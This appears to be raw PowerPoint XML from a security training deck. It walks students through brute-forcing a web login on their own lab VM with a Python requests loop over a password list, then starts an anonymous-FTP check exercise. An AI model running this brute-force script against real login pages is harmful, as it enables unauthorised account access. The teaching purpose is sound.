              </a:rPr>
              <a:t>&amp;Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>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err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>🛑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>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err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lolwat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>🛑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>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err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qwerty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>🛑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;Enter=Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>🛑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http:// . . ./brute2.php?password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>badpassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>✅</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11430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94043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8F99-AF16-2B42-92DE-E1AAC21519C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ED63A34-9688-EC4D-AB8A-5CF2CAFBEB8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142874" y="0"/>
            <a:ext cx="8201025" cy="6686550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300"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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/python3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import requests</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passwords = open('passwords', 'r')</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#replace IP with the IP of your Ubuntu VM...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>base_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "http://192.168.2.159/brute2.php?password="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>end_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "&amp;Enter=Enter"</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for password in passwords:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>password.rstrip</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base_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + password + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>end_url</a:t>
            </a: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try:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    r = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>requests.get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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r.status_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == 200:</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result_len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r.content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	print("Password: " + password  + "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> size = " + str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>result_len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>))</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except:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    pass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214467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902E-156A-D84D-83D0-1DF603DCE4AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E399D09A-7A45-6347-95F3-E7FA05125EE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3200400"/>
            <a:ext cx="7620000" cy="3357563"/>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z="2800" dirty="0"/>
              <a:t>Since we know “password” doesn’t work and the size of the reply = 137 then…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>137 = wrong password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Anything else = possible password or something worth checking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEACD5CF-3912-6342-8F03-066EBAE43C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01" y="550736"/>
            <a:ext cx="9103899" cy="2106487"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1820972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D6EF-D65C-4C4A-8A49-C7EC0D4CA159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>badpassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Content Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{044AA332-93BC-F241-A4E4-87B6C19CDC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91" y="1267653"/>
            <a:ext cx="8532688" cy="5215995"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1925266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7383-C704-A646-BB8F-945CAD4A898F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exercise: Anonymous FTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3243632A-0058-BF4B-9F5D-758F45A59E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’re going to make a script to check if an FTP server is running an anonymous FTP server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To do this we open a connect to the FTP server on port 21 and log in as “anonymous”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Successful login = anonymous FTP server!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why do this?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Because I say so.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python has the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ftplib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” module for this which makes FTP connections in python a snap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3077166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F1AB-66F2-3D48-BD3B-31432AAEA071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ftplib</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2DD201D-1C8D-A848-A823-9954BA8D9969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8058150" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What we need:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ftplib</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ftp = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ftplib.FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(hostname)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ftp.login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(‘username’, password')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ftp.quit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
